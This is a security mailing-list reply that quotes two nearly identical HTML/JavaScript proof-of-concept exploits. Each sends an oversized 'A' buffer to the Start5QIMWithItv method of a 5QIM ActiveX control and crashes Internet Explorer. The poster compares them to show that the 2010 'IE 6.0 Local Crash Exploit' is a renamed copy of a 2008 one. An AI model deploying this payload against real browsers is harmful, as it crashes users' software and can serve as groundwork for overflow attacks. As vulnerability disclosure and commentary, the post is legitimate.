Re: IE 6.0 - Local Crash Exploit

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Spot the difference:

###############################################################################################
5QIM 2.0.0.9 IE Crash Exploit
2008-02-25 08:26

<object id="xiaonei" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6" style="display:none;">
</object>
<script>
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AAAAAAAAAA";}
object = document.getElementById("xiaonei");
object.Start5QIMWithItv('test','test',buff);
}
</script>
<pre>
<a href="javascript:;" OnClick="crash()">Crash...</a>
</pre>

###############################################################################################
and:

On Sat, 20 Mar 2010, info@xxxxxxxxxxxxxx wrote:

###############################################################################################
# Securitylab.ir
###############################################################################################
Vul:

<object id="opi" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6" style="display:none;">
</object>
<script>
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AAAAAAAAAA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}
</script>
<pre>
<a href="javascript:;" OnClick="crash()">.!.</a>
</pre>
###############################################################################################
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand (whh_iran@xxxxxxxxx,Pouya.Securitylab.ir)
###############################################################################################

Yep - the date, the object name and the attribution.

http://hi.baidu.com/flyhat/blog/item/64e6a700a59c5015728b6518.html

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux